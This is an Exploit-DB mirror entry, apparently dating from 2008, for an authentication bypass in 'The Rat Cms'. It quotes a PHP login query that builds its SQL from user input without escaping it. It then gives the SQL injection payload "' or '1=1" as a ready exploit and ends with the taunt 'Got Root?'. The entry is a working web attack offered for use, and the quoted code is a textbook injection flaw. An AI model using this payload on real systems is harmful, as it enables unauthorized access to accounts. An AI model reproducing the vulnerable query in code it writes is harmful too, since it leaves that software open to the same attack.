exploit-db-mirror/exploits/php/webapps/7478.txt
Offensive Security d304cc3d3e DB: 2017-11-24
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

19 lines
No EOL
466 B
Text

---------------------------------
The Rat Cms Auth By Pass
---------------------------------
Autore: x0r
Email: andry2000@hotmail.it
--------------------------------
Bug In: \login.php
$sql = "SELECT user_id
FROM tbl_auth_user
WHERE user_id = '$userId' AND user_password = PASSWORD('$password')";
$result = mysql_query($sql) or die('Query failed. ' . mysql_error());
Exploit: ' or '1=1
^^ Got Root?
# milw0rm.com [2008-12-15]